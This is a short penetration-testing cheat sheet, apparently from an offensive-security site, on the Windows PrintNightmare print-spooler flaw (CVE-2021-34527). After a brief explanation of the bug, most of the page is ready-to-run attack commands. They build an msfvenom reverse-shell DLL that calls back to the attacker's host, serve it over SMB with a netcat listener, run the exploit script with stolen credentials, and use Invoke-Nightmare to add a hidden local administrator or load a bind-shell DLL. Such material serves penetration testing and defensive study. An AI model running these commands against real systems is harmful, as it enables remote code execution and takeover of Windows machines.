❯ RedSquad

PrintNightmare - CVE-2021-34527

2 min read

Overview

“PrintNightmare” refers to an RCE (Remote Command Execution) vulnerability. If the vulnerable machine is configured to reject remote connection, this vulnerability could still be exploited in an LPE (Local Privilege Escalation) context. In a detailed blogpost (here), Cyberwatch describes that the vulnerability lies in the functions allowing remote driver installation by users, RpcAddPrinterDriverEx and RpcAddPrinterDriver:

  1. The attacker stores the driver DLL file on a SMB share reachable from the server.
  2. The client creates a DRIVER_INFO_2 object containing the path to the attacker’s DLL and passes it into the DRIVER_CONTAINER object.
  3. The client calls RpcAddPrinterDriverEx with the DRIVER_CONTAINER to load the attacker’s DLL into the server’s dynamic library and with multiple bit values within the dwFileCopyFlags in order to bypass the SeLoadDriverPrivilege privilege verification by the server.
  4. The attacker’s DLL is executed on the server within SYSTEM context.

Is Spooler active ?

# with cme
nxc smb <target_ip> -M spooler
 
# with impacket
rpcdump.py @<target_ip> | egrep 'MS-RPRN|MS-PAR'

Exploit

Linux

  1. Check if the target’s RPC pipes are available: Impacket’s rpcdump.py
  2. Generate a DLL payload: msfvenom
  3. Host an SMB server from which the DLL can be fetched: Impacket’s smbserver.py
  4. Exploit PrintNightmare: CVE-2021-1675.py (MS-RPRN abuseMS-PAR abuse)
  5. Profit from the DLL being executed by the target
# Create a DLL payload (reverse shell in this example)
msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=<local_ip> LPORT=<local_port> -o /workspace/smb/remote.dll
 
# Host a SMB share 
smbserver.py -smb2support "WHATEVERNAME" /workspace/smb/
 
# Start the listener (for the reverse shell)
nc -lvnp <local_port>
 
# Run the exploit
CVE-2021-1675.py <domain>/<user>:<password>@<target_ip> '\\$LOCAL_IP\$SHARE\remote.dll'

Windows

https://github.com/JohnHammond/CVE-2021-34527

powershell -ep bypass
# add new user to local admin group
Import-Module .\cve-2021-34527.ps1
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
 
# or custom DLL
Import-Module .\cve-2021-34527.ps1
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"